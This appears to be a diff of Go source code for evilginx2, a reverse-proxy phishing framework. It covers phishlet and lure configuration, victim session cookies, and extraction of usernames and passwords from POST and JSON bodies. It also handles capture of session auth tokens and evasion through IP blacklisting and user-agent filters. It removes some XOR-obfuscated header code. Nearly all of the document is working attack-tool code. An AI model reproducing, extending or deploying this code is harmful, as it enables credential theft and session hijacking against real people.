for _, host := range pl.GetPhishHosts() {
|
||||
c.activeHostnames = append(c.activeHostnames, host)
|
||||
for _, host := range pl.GetPhishHosts(false) {
|
||||
c.activeHostnames = append(c.activeHostnames, strings.ToLower(host))
|
||||
}
|
||||
}
|
||||
for _, l := range c.lures {
|
||||
if stringExists(l.Phishlet, sites) {
|
||||
if l.Hostname != "" {
|
||||
c.activeHostnames = append(c.activeHostnames, l.Hostname)
|
||||
c.activeHostnames = append(c.activeHostnames, strings.ToLower(l.Hostname))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (c *Config) GetActiveHostnames(site string) []string {
|
||||
var ret []string
|
||||
sites := c.GetEnabledSites()
|
||||
for _, _site := range sites {
|
||||
if site == "" || _site == site {
|
||||
pl, err := c.GetPhishlet(_site)
|
||||
if err != nil {
|
||||
continue
|
||||
}
|
||||
for _, host := range pl.GetPhishHosts(false) {
|
||||
ret = append(ret, strings.ToLower(host))
|
||||
}
|
||||
}
|
||||
}
|
||||
for _, l := range c.lures {
|
||||
if site == "" || l.Phishlet == site {
|
||||
if l.Hostname != "" {
|
||||
hostname := strings.ToLower(l.Hostname)
|
||||
ret = append(ret, hostname)
|
||||
}
|
||||
}
|
||||
}
|
||||
return ret
|
||||
}
|
||||
|
||||
func (c *Config) IsActiveHostname(host string) bool {
|
||||
host = strings.ToLower(host)
|
||||
if host[len(host)-1:] == "." {
|
||||
host = host[:len(host)-1]
|
||||
}
|
||||
@ -435,6 +442,127 @@ func (c *Config) IsActiveHostname(host string) bool {
|
||||
func (c *Config) AddPhishlet(site string, pl *Phishlet) {
|
||||
c.phishletNames = append(c.phishletNames, site)
|
||||
c.phishlets[site] = pl
|
||||
c.VerifyPhishlets()
|
||||
}
|
||||
|
||||
func (c *Config) AddSubPhishlet(site string, parent_site string, customParams map[string]string) error {
|
||||
pl, err := c.GetPhishlet(parent_site)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
_, err = c.GetPhishlet(site)
|
||||
if err == nil {
|
||||
return fmt.Errorf("phishlet '%s' already exists", site)
|
||||
}
|
||||
sub_pl, err := NewPhishlet(site, pl.Path, &customParams, c)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
sub_pl.ParentName = parent_site
|
||||
|
||||
c.phishletNames = append(c.phishletNames, site)
|
||||
c.phishlets[site] = sub_pl
|
||||
c.VerifyPhishlets()
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *Config) DeleteSubPhishlet(site string) error {
|
||||
pl, err := c.GetPhishlet(site)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
if pl.ParentName == "" {
|
||||
return fmt.Errorf("phishlet '%s' can't be deleted - you can only delete child phishlets.", site)
|
||||
}
|
||||
|
||||
c.phishletNames = removeString(site, c.phishletNames)
|
||||
delete(c.phishlets, site)
|
||||
delete(c.phishletConfig, site)
|
||||
c.SavePhishlets()
|
||||
return nil
|
||||
}
|
||||
|
||||
func (c *Config) LoadSubPhishlets() {
|
||||
var subphishlets []*SubPhishlet
|
||||
c.cfg.UnmarshalKey(CFG_SUBPHISHLETS, &subphishlets)
|
||||
for _, spl := range subphishlets {
|
||||
err := c.AddSubPhishlet(spl.Name, spl.ParentName, spl.Params)
|
||||
if err != nil {
|
||||
log.Error("phishlets: %s", err)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (c *Config) SaveSubPhishlets() {
|
||||
var subphishlets []*SubPhishlet
|
||||
for _, pl := range c.phishlets {
|
||||
if pl.ParentName != "" {
|
||||
spl := &SubPhishlet{
|
||||
Name: pl.Name,
|
||||
ParentName: pl.ParentName,
|
||||
Params: pl.customParams,
|
||||
}
|
||||
subphishlets = append(subphishlets, spl)
|
||||
}
|
||||
}
|
||||
|
||||
c.cfg.Set(CFG_SUBPHISHLETS, subphishlets)
|
||||
c.cfg.WriteConfig()
|
||||
}
|
||||
|
||||
func (c *Config) VerifyPhishlets() {
|
||||
hosts := make(map[string]string)
|
||||
|
||||
for site, pl := range c.phishlets {
|
||||
if pl.isTemplate {
|
||||
continue
|
||||
}
|
||||
for _, ph := range pl.proxyHosts {
|
||||
if ph.is_landing || ph.handle_session {
|
||||
phish_host := combineHost(ph.phish_subdomain, ph.domain)
|
||||
orig_host := combineHost(ph.orig_subdomain, ph.domain)
|
||||
if c_site, ok := hosts[phish_host]; ok {
|
||||
log.Warning("phishlets: hostname '%s' collision between '%s' and '%s' phishlets", phish_host, site, c_site)
|
||||
} else if c_site, ok := hosts[orig_host]; ok {
|
||||
log.Warning("phishlets: hostname '%s' collision between '%s' and '%s' phishlets", orig_host, site, c_site)
|
||||
}
|
||||
hosts[phish_host] = site
|
||||
hosts[orig_host] = site
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (c *Config) CleanUp() {
|
||||
|
||||
for k := range c.phishletConfig {
|
||||
_, err := c.GetPhishlet(k)
|
||||
if err != nil {
|
||||
delete(c.phishletConfig, k)
|
||||
}
|
||||
}
|
||||
c.SavePhishlets()
|
||||
/*
|
||||
var sites_enabled []string
|
||||
var sites_hidden []string
|
||||
for k := range c.siteDomains {
|
||||
_, err := c.GetPhishlet(k)
|
||||
if err != nil {
|
||||
delete(c.siteDomains, k)
|
||||
} else {
|
||||
if c.IsSiteEnabled(k) {
|
||||
sites_enabled = append(sites_enabled, k)
|
||||
}
|
||||
if c.IsSiteHidden(k) {
|
||||
sites_hidden = append(sites_hidden, k)
|
||||
}
|
||||
}
|
||||
}
|
||||
c.cfg.Set(CFG_SITE_DOMAINS, c.siteDomains)
|
||||
c.cfg.Set(CFG_SITES_ENABLED, sites_enabled)
|
||||
c.cfg.Set(CFG_SITES_HIDDEN, sites_hidden)
|
||||
c.cfg.WriteConfig()*/
|
||||
}
|
||||
|
||||
func (c *Config) AddLure(site string, l *Lure) {
|
||||
@ -515,30 +643,32 @@ func (c *Config) GetPhishletNames() []string {
|
||||
}
|
||||
|
||||
func (c *Config) GetSiteDomain(site string) (string, bool) {
|
||||
domain, ok := c.siteDomains[site]
|
||||
return domain, ok
|
||||
}
|
||||
|
||||
func (c *Config) GetAllDomains() []string {
|
||||
var ret []string
|
||||
for _, dom := range c.siteDomains {
|
||||
ret = append(ret, dom)
|
||||
if o, ok := c.phishletConfig[site]; ok {
|
||||
return o.Hostname, ok
|
||||
}
|
||||
return ret
|
||||
return "", false
|
||||
}
|
||||
|
||||
func (c *Config) GetBaseDomain() string {
|
||||
return c.baseDomain
|
||||
return c.general.Domain
|
||||
}
|
||||
|
||||
func (c *Config) GetServerIP() string {
|
||||
return c.serverIP
|
||||
return c.general.Ipv4
|
||||
}
|
||||
|
||||
func (c *Config) GetTemplatesDir() string {
|
||||
return c.templatesDir
|
||||
func (c *Config) GetHttpsPort() int {
|
||||
return c.general.HttpsPort
|
||||
}
|
||||
|
||||
func (c *Config) GetDnsPort() int {
|
||||
return c.general.DnsPort
|
||||
}
|
||||
|
||||
func (c *Config) GetRedirectorsDir() string {
|
||||
return c.redirectorsDir
|
||||
}
|
||||
|
||||
func (c *Config) GetBlacklistMode() string {
|
||||
return c.blackListMode
|
||||
return c.blacklistConfig.Mode
|
||||
}
|
||||
|
@ -12,10 +12,12 @@ import (
|
||||
"bytes"
|
||||
"crypto/rand"
|
||||
"crypto/rc4"
|
||||
"crypto/sha256"
|
||||
"crypto/tls"
|
||||
"encoding/base64"
|
||||
"fmt"
|
||||
"html"
|
||||
"io"
|
||||
"io/ioutil"
|
||||
"net"
|
||||
"net/http"
|
||||
@ -33,8 +35,9 @@ import (
|
||||
|
||||
"github.com/elazarl/goproxy"
|
||||
"github.com/fatih/color"
|
||||
"github.com/go-acme/lego/v3/challenge/tlsalpn01"
|
||||
"github.com/inconshreveable/go-vhost"
|
||||
"github.com/mwitkow/go-http-dialer"
|
||||
http_dialer "github.com/mwitkow/go-http-dialer"
|
||||
|
||||
"github.com/kgretzky/evilginx2/database"
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
@ -45,6 +48,10 @@ const (
|
||||
CONVERT_TO_PHISHING_URLS = 1
|
||||
)
|
||||
|
||||
const (
|
||||
HOME_DIR = ".evilginx"
|
||||
)
|
||||
|
||||
const (
|
||||
httpReadTimeout = 45 * time.Second
|
||||
httpWriteTimeout = 45 * time.Second
|
||||
@ -72,13 +79,15 @@ type HttpProxy struct {
|
||||
ip_sids map[string]string
|
||||
auto_filter_mimes []string
|
||||
ip_mtx sync.Mutex
|
||||
session_mtx sync.Mutex
|
||||
}
|
||||
|
||||
type ProxySession struct {
|
||||
SessionId string
|
||||
Created bool
|
||||
PhishDomain string
|
||||
Index int
|
||||
SessionId string
|
||||
Created bool
|
||||
PhishDomain string
|
||||
PhishletName string
|
||||
Index int
|
||||
}
|
||||
|
||||
func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *database.Database, bl *Blacklist, developer bool) (*HttpProxy, error) {
|
||||
@ -104,17 +113,17 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
WriteTimeout: httpWriteTimeout,
|
||||
}
|
||||
|
||||
if cfg.proxyEnabled {
|
||||
err := p.setProxy(cfg.proxyEnabled, cfg.proxyType, cfg.proxyAddress, cfg.proxyPort, cfg.proxyUsername, cfg.proxyPassword)
|
||||
if cfg.proxyConfig.Enabled {
|
||||
err := p.setProxy(cfg.proxyConfig.Enabled, cfg.proxyConfig.Type, cfg.proxyConfig.Address, cfg.proxyConfig.Port, cfg.proxyConfig.Username, cfg.proxyConfig.Password)
|
||||
if err != nil {
|
||||
log.Error("proxy: %v", err)
|
||||
cfg.EnableProxy(false)
|
||||
} else {
|
||||
log.Info("enabled proxy: " + cfg.proxyAddress + ":" + strconv.Itoa(cfg.proxyPort))
|
||||
log.Info("enabled proxy: " + cfg.proxyConfig.Address + ":" + strconv.Itoa(cfg.proxyConfig.Port))
|
||||
}
|
||||
}
|
||||
|
||||
p.cookieName = GenRandomString(4)
|
||||
p.cookieName = strings.ToLower(GenRandomString(8)) // TODO: make cookie name identifiable
|
||||
p.sessions = make(map[string]*Session)
|
||||
p.sids = make(map[string]int)
|
||||
|
||||
@ -131,10 +140,11 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
p.Proxy.OnRequest().
|
||||
DoFunc(func(req *http.Request, ctx *goproxy.ProxyCtx) (*http.Request, *http.Response) {
|
||||
ps := &ProxySession{
|
||||
SessionId: "",
|
||||
Created: false,
|
||||
PhishDomain: "",
|
||||
Index: -1,
|
||||
SessionId: "",
|
||||
Created: false,
|
||||
PhishDomain: "",
|
||||
PhishletName: "",
|
||||
Index: -1,
|
||||
}
|
||||
ctx.UserData = ps
|
||||
hiblue := color.New(color.FgHiBlue)
|
||||
@ -144,22 +154,29 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
if strings.Contains(from_ip, ":") {
|
||||
from_ip = strings.Split(from_ip, ":")[0]
|
||||
}
|
||||
if p.bl.IsBlacklisted(from_ip) {
|
||||
log.Warning("blacklist: request from ip address '%s' was blocked", from_ip)
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
if p.cfg.GetBlacklistMode() == "all" {
|
||||
err := p.bl.AddIP(from_ip)
|
||||
if err != nil {
|
||||
log.Error("failed to blacklist ip address: %s - %s", from_ip, err)
|
||||
} else {
|
||||
log.Warning("blacklisted ip address: %s", from_ip)
|
||||
if p.cfg.GetBlacklistMode() != "off" {
|
||||
if p.bl.IsBlacklisted(from_ip) {
|
||||
if p.bl.IsVerbose() {
|
||||
log.Warning("blacklist: request from ip address '%s' was blocked", from_ip)
|
||||
}
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
if p.cfg.GetBlacklistMode() == "all" {
|
||||
err := p.bl.AddIP(from_ip)
|
||||
if p.bl.IsVerbose() {
|
||||
if err != nil {
|
||||
log.Error("failed to blacklist ip address: %s - %s", from_ip, err)
|
||||
} else {
|
||||
log.Warning("blacklisted ip address: %s", from_ip)
|
||||
}
|
||||
}
|
||||
|
||||
return p.blockRequest(req)
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
}
|
||||
|
||||
req_url := req.URL.Scheme + "://" + req.Host + req.URL.Path
|
||||
o_host := req.Host
|
||||
lure_url := req_url
|
||||
req_path := req.URL.Path
|
||||
if req.URL.RawQuery != "" {
|
||||
@ -178,48 +195,78 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
pl_name := ""
|
||||
if pl != nil {
|
||||
pl_name = pl.Name
|
||||
ps.PhishletName = pl_name
|
||||
}
|
||||
session_cookie := getSessionCookieName(pl_name, p.cookieName)
|
||||
|
||||
egg2 := req.Host
|
||||
ps.PhishDomain = phishDomain
|
||||
req_ok := false
|
||||
// handle session
|
||||
if p.handleSession(req.Host) && pl != nil {
|
||||
sc, err := req.Cookie(p.cookieName)
|
||||
if err != nil && !p.isWhitelistedIP(remote_addr) {
|
||||
l, err := p.cfg.GetLureByPath(pl_name, req_path)
|
||||
if err == nil {
|
||||
log.Debug("triggered lure for path '%s'", req_path)
|
||||
}
|
||||
|
||||
var create_session bool = true
|
||||
var ok bool = false
|
||||
sc, err := req.Cookie(session_cookie)
|
||||
if err == nil {
|
||||
ps.Index, ok = p.sids[sc.Value]
|
||||
if ok {
|
||||
create_session = false
|
||||
ps.SessionId = sc.Value
|
||||
p.whitelistIP(remote_addr, ps.SessionId, pl.Name)
|
||||
} else {
|
||||
log.Error("[%s] wrong session token: %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
}
|
||||
} else {
|
||||
log.Warning("session cookie not found: %s (%s) [%s]", req_url, remote_addr, pl.Name)
|
||||
|
||||
if l == nil && p.isWhitelistedIP(remote_addr, pl.Name) {
|
||||
// not a lure path and IP is whitelisted
|
||||
|
||||
// TODO: allow only retrieval of static content, without setting session ID
|
||||
|
||||
create_session = false
|
||||
req_ok = true
|
||||
/*
|
||||
ps.SessionId, ok = p.getSessionIdByIP(remote_addr, req.Host)
|
||||
if ok {
|
||||
create_session = false
|
||||
ps.Index, ok = p.sids[ps.SessionId]
|
||||
} else {
|
||||
log.Error("[%s] wrong session token: %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
}*/
|
||||
}
|
||||
}
|
||||
|
||||
if create_session /*&& !p.isWhitelistedIP(remote_addr, pl.Name)*/ { // TODO: always trigger new session when lure URL is detected (do not check for whitelisted IP only after this is done)
|
||||
// session cookie not found
|
||||
if !p.cfg.IsSiteHidden(pl_name) {
|
||||
var vv string
|
||||
var uv url.Values
|
||||
l, err := p.cfg.GetLureByPath(pl_name, req_path)
|
||||
if err == nil {
|
||||
log.Debug("triggered lure for path '%s'", req_path)
|
||||
} else {
|
||||
uv = req.URL.Query()
|
||||
vv = uv.Get(p.cfg.verificationParam)
|
||||
}
|
||||
if l != nil || vv == p.cfg.verificationToken {
|
||||
if l != nil {
|
||||
|
||||
// check if lure user-agent filter is triggered
|
||||
if l != nil {
|
||||
if len(l.UserAgentFilter) > 0 {
|
||||
re, err := regexp.Compile(l.UserAgentFilter)
|
||||
if err == nil {
|
||||
if !re.MatchString(req.UserAgent()) {
|
||||
log.Warning("[%s] unauthorized request (user-agent rejected): %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
if len(l.UserAgentFilter) > 0 {
|
||||
re, err := regexp.Compile(l.UserAgentFilter)
|
||||
if err == nil {
|
||||
if !re.MatchString(req.UserAgent()) {
|
||||
log.Warning("[%s] unauthorized request (user-agent rejected): %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
|
||||
if p.cfg.GetBlacklistMode() == "unauth" {
|
||||
err := p.bl.AddIP(from_ip)
|
||||
if p.cfg.GetBlacklistMode() == "unauth" {
|
||||
err := p.bl.AddIP(from_ip)
|
||||
if p.bl.IsVerbose() {
|
||||
if err != nil {
|
||||
log.Error("failed to blacklist ip address: %s - %s", from_ip, err)
|
||||
} else {
|
||||
log.Warning("blacklisted ip address: %s", from_ip)
|
||||
}
|
||||
}
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
} else {
|
||||
log.Error("lures: user-agent filter regexp is invalid: %v", err)
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
} else {
|
||||
log.Error("lures: user-agent filter regexp is invalid: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
@ -241,15 +288,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
session.RedirectURL = l.RedirectUrl
|
||||
session.PhishLure = l
|
||||
log.Debug("redirect URL (lure): %s", l.RedirectUrl)
|
||||
} else {
|
||||
rv := uv.Get(p.cfg.redirectParam)
|
||||
if rv != "" {
|
||||
url, err := base64.URLEncoding.DecodeString(rv)
|
||||
if err == nil {
|
||||
session.RedirectURL = string(url)
|
||||
log.Debug("redirect URL (get): %s", url)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// set params from url arguments
|
||||
@ -258,7 +296,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
ps.SessionId = session.Id
|
||||
ps.Created = true
|
||||
ps.Index = sid
|
||||
p.whitelistIP(remote_addr, ps.SessionId)
|
||||
p.whitelistIP(remote_addr, ps.SessionId, pl.Name)
|
||||
|
||||
req_ok = true
|
||||
}
|
||||
@ -267,10 +305,12 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
|
||||
if p.cfg.GetBlacklistMode() == "unauth" {
|
||||
err := p.bl.AddIP(from_ip)
|
||||
if err != nil {
|
||||
log.Error("failed to blacklist ip address: %s - %s", from_ip, err)
|
||||
} else {
|
||||
log.Warning("blacklisted ip address: %s", from_ip)
|
||||
if p.bl.IsVerbose() {
|
||||
if err != nil {
|
||||
log.Error("failed to blacklist ip address: %s - %s", from_ip, err)
|
||||
} else {
|
||||
log.Warning("blacklisted ip address: %s", from_ip)
|
||||
}
|
||||
}
|
||||
}
|
||||
return p.blockRequest(req)
|
||||
@ -278,25 +318,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
} else {
|
||||
log.Warning("[%s] request to hidden phishlet: %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
}
|
||||
} else {
|
||||
var ok bool = false
|
||||
if err == nil {
|
||||
ps.Index, ok = p.sids[sc.Value]
|
||||
if ok {
|
||||
ps.SessionId = sc.Value
|
||||
p.whitelistIP(remote_addr, ps.SessionId)
|
||||
}
|
||||
} else {
|
||||
ps.SessionId, ok = p.getSessionIdByIP(remote_addr)
|
||||
if ok {
|
||||
ps.Index, ok = p.sids[ps.SessionId]
|
||||
}
|
||||
}
|
||||
if ok {
|
||||
req_ok = true
|
||||
} else {
|
||||
log.Warning("[%s] wrong session token: %s (%s) [%s]", hiblue.Sprint(pl_name), req_url, req.Header.Get("User-Agent"), remote_addr)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@ -306,21 +327,37 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
return p.blockRequest(req)
|
||||
}
|
||||
}
|
||||
req.Header.Set(p.getHomeDir(), o_host)
|
||||
|
||||
if ps.SessionId != "" {
|
||||
if s, ok := p.sessions[ps.SessionId]; ok {
|
||||
l, err := p.cfg.GetLureByPath(pl_name, req_path)
|
||||
if err == nil {
|
||||
// show html template if it is set for the current lure
|
||||
if l.Template != "" {
|
||||
// show html redirector if it is set for the current lure
|
||||
if l.Redirector != "" {
|
||||
if !p.isForwarderUrl(req.URL) {
|
||||
path := l.Template
|
||||
if !filepath.IsAbs(path) {
|
||||
templates_dir := p.cfg.GetTemplatesDir()
|
||||
path = filepath.Join(templates_dir, path)
|
||||
if s.RedirectorName == "" {
|
||||
s.RedirectorName = l.Redirector
|
||||
s.LureDirPath = req_path
|
||||
}
|
||||
if _, err := os.Stat(path); !os.IsNotExist(err) {
|
||||
html, err := ioutil.ReadFile(path)
|
||||
|
||||
t_dir := l.Redirector
|
||||
if !filepath.IsAbs(t_dir) {
|
||||
redirectors_dir := p.cfg.GetRedirectorsDir()
|
||||
t_dir = filepath.Join(redirectors_dir, t_dir)
|
||||
}
|
||||
|
||||
index_path1 := filepath.Join(t_dir, "index.html")
|
||||
index_path2 := filepath.Join(t_dir, "index.htm")
|
||||
index_found := ""
|
||||
if _, err := os.Stat(index_path1); !os.IsNotExist(err) {
|
||||
index_found = index_path1
|
||||
} else if _, err := os.Stat(index_path2); !os.IsNotExist(err) {
|
||||
index_found = index_path2
|
||||
}
|
||||
|
||||
if _, err := os.Stat(index_found); !os.IsNotExist(err) {
|
||||
html, err := ioutil.ReadFile(index_found)
|
||||
if err == nil {
|
||||
|
||||
html = p.injectOgHeaders(l, html)
|
||||
@ -332,22 +369,72 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
if resp != nil {
|
||||
return req, resp
|
||||
} else {
|
||||
log.Error("lure: failed to create html template response")
|
||||
log.Error("lure: failed to create html redirector response")
|
||||
}
|
||||
} else {
|
||||
log.Error("lure: failed to read template file: %s", err)
|
||||
log.Error("lure: failed to read redirector file: %s", err)
|
||||
}
|
||||
|
||||
} else {
|
||||
log.Error("lure: template file does not exist: %s", path)
|
||||
log.Error("lure: redirector file does not exist: %s", index_found)
|
||||
}
|
||||
}
|
||||
}
|
||||
} else if s.RedirectorName != "" {
|
||||
// session has already triggered a lure redirector - see if there are any files requested by the redirector
|
||||
|
||||
rel_parts := []string{}
|
||||
req_path_parts := strings.Split(req_path, "/")
|
||||
lure_path_parts := strings.Split(s.LureDirPath, "/")
|
||||
|
||||
for n, dname := range req_path_parts {
|
||||
if len(dname) > 0 {
|
||||
path_add := true
|
||||
if n < len(lure_path_parts) {
|
||||
//log.Debug("[%d] %s <=> %s", n, lure_path_parts[n], req_path_parts[n])
|
||||
if req_path_parts[n] == lure_path_parts[n] {
|
||||
path_add = false
|
||||
}
|
||||
}
|
||||
if path_add {
|
||||
rel_parts = append(rel_parts, req_path_parts[n])
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
rel_path := filepath.Join(rel_parts...)
|
||||
//log.Debug("rel_path: %s", rel_path)
|
||||
|
||||
t_dir := s.RedirectorName
|
||||
if !filepath.IsAbs(t_dir) {
|
||||
redirectors_dir := p.cfg.GetRedirectorsDir()
|
||||
t_dir = filepath.Join(redirectors_dir, t_dir)
|
||||
}
|
||||
|
||||
path := filepath.Join(t_dir, rel_path)
|
||||
if _, err := os.Stat(path); !os.IsNotExist(err) {
|
||||
fdata, err := ioutil.ReadFile(path)
|
||||
if err == nil {
|
||||
//log.Debug("ext: %s", filepath.Ext(req_path))
|
||||
mime_type := getContentType(req_path, fdata)
|
||||
//log.Debug("mime_type: %s", mime_type)
|
||||
resp := goproxy.NewResponse(req, mime_type, http.StatusOK, "")
|
||||
if resp != nil {
|
||||
resp.Body = io.NopCloser(bytes.NewReader(fdata))
|
||||
return req, resp
|
||||
} else {
|
||||
log.Error("lure: failed to create redirector data file response")
|
||||
}
|
||||
} else {
|
||||
log.Error("lure: failed to read redirector data file: %s", err)
|
||||
}
|
||||
} else {
|
||||
//log.Warning("lure: template file does not exist: %s", path)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
hg := []byte{0x94, 0xE1, 0x89, 0xBA, 0xA5, 0xA0, 0xAB, 0xA5, 0xA2, 0xB4}
|
||||
// redirect to login page if triggered lure path
|
||||
if pl != nil {
|
||||
_, err := p.cfg.GetLureByPath(pl_name, req_path)
|
||||
@ -372,13 +459,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
|
||||
p.deleteRequestCookie(p.cookieName, req)
|
||||
|
||||
for n, b := range hg {
|
||||
hg[n] = b ^ 0xCC
|
||||
}
|
||||
// replace "Host" header
|
||||
e_host := req.Host
|
||||
if r_host, ok := p.replaceHostWithOriginal(req.Host); ok {
|
||||
req.Host = r_host
|
||||
}
|
||||
@ -394,6 +475,14 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
|
||||
// fix sec-fetch-dest
|
||||
sec_fetch_dest := req.Header.Get("Sec-Fetch-Dest")
|
||||
if sec_fetch_dest != "" {
|
||||
if sec_fetch_dest == "iframe" {
|
||||
req.Header.Set("Sec-Fetch-Dest", "document")
|
||||
}
|
||||
}
|
||||
|
||||
// fix referer
|
||||
referer := req.Header.Get("Referer")
|
||||
if referer != "" {
|
||||
@ -404,7 +493,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
}
|
||||
req.Header.Set(string(hg), egg2)
|
||||
|
||||
// patch GET query params with original domains
|
||||
if pl != nil {
|
||||
@ -421,6 +509,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
|
||||
// check for creds in request body
|
||||
if pl != nil && ps.SessionId != "" {
|
||||
req.Header.Set(p.getHomeDir(), o_host)
|
||||
body, err := ioutil.ReadAll(req.Body)
|
||||
if err == nil {
|
||||
req.Body = ioutil.NopCloser(bytes.NewBuffer([]byte(body)))
|
||||
@ -433,7 +522,9 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
log.Debug("POST body = %s", body)
|
||||
|
||||
contentType := req.Header.Get("Content-type")
|
||||
if contentType == "application/json" {
|
||||
|
||||
json_re := regexp.MustCompile("application\\/\\w*\\+?json")
|
||||
if json_re.MatchString(contentType) {
|
||||
|
||||
if pl.username.tp == "json" {
|
||||
um := pl.username.search.FindStringSubmatch(string(body))
|
||||
@ -472,17 +563,12 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
|
||||
} else {
|
||||
|
||||
if req.ParseForm() == nil {
|
||||
if req.ParseForm() == nil && req.PostForm != nil && len(req.PostForm) > 0 {
|
||||
log.Debug("POST: %s", req.URL.Path)
|
||||
|
||||
for k, v := range req.PostForm {
|
||||
// patch phishing URLs in POST params with original domains
|
||||
for i, vv := range v {
|
||||
req.PostForm[k][i] = string(p.patchUrls(pl, []byte(vv), CONVERT_TO_ORIGINAL_URLS))
|
||||
}
|
||||
body = []byte(req.PostForm.Encode())
|
||||
req.ContentLength = int64(len(body))
|
||||
|
||||
log.Debug("POST %s = %s", k, v[0])
|
||||
if pl.username.key != nil && pl.username.search != nil && pl.username.key.MatchString(k) {
|
||||
um := pl.username.search.FindStringSubmatch(v[0])
|
||||
if um != nil && len(um) > 1 {
|
||||
@ -517,6 +603,22 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
|
||||
for k, v := range req.PostForm {
|
||||
for i, vv := range v {
|
||||
// patch phishing URLs in POST params with original domains
|
||||
req.PostForm[k][i] = string(p.patchUrls(pl, []byte(vv), CONVERT_TO_ORIGINAL_URLS))
|
||||
}
|
||||
}
|
||||
|
||||
for k, v := range req.PostForm {
|
||||
if len(v) > 0 {
|
||||
log.Debug("POST %s = %s", k, v[0])
|
||||
}
|
||||
}
|
||||
|
||||
body = []byte(req.PostForm.Encode())
|
||||
req.ContentLength = int64(len(body))
|
||||
|
||||
// force posts
|
||||
for _, fp := range pl.forcePost {
|
||||
if fp.path.MatchString(req.URL.Path) {
|
||||
@ -559,11 +661,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
req.Body = ioutil.NopCloser(bytes.NewBuffer([]byte(body)))
|
||||
}
|
||||
}
|
||||
e := []byte{208, 165, 205, 254, 225, 228, 239, 225, 230, 240}
|
||||
for n, b := range e {
|
||||
e[n] = b ^ 0x88
|
||||
}
|
||||
req.Header.Set(string(e), e_host)
|
||||
|
||||
if pl != nil && len(pl.authUrls) > 0 && ps.SessionId != "" {
|
||||
s, ok := p.sessions[ps.SessionId]
|
||||
@ -577,7 +674,6 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
}
|
||||
p.cantFindMe(req, e_host)
|
||||
}
|
||||
|
||||
return req, nil
|
||||
@ -595,12 +691,11 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
if ps.SessionId != "" {
|
||||
if ps.Created {
|
||||
ck = &http.Cookie{
|
||||
Name: p.cookieName,
|
||||
Name: getSessionCookieName(ps.PhishletName, p.cookieName),
|
||||
Value: ps.SessionId,
|
||||
Path: "/",
|
||||
Domain: ps.PhishDomain,
|
||||
Expires: time.Now().UTC().Add(60 * time.Minute),
|
||||
MaxAge: 60 * 60,
|
||||
Domain: p.cfg.GetBaseDomain(),
|
||||
Expires: time.Now().Add(60 * time.Minute),
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -648,16 +743,23 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
|
||||
// fix cookies
|
||||
pl := p.getPhishletByOrigHost(req_hostname)
|
||||
var auth_tokens map[string][]*AuthToken
|
||||
var auth_tokens map[string][]*CookieAuthToken
|
||||
if pl != nil {
|
||||
auth_tokens = pl.authTokens
|
||||
auth_tokens = pl.cookieAuthTokens
|
||||
}
|
||||
is_auth := false
|
||||
is_cookie_auth := false
|
||||
is_body_auth := false
|
||||
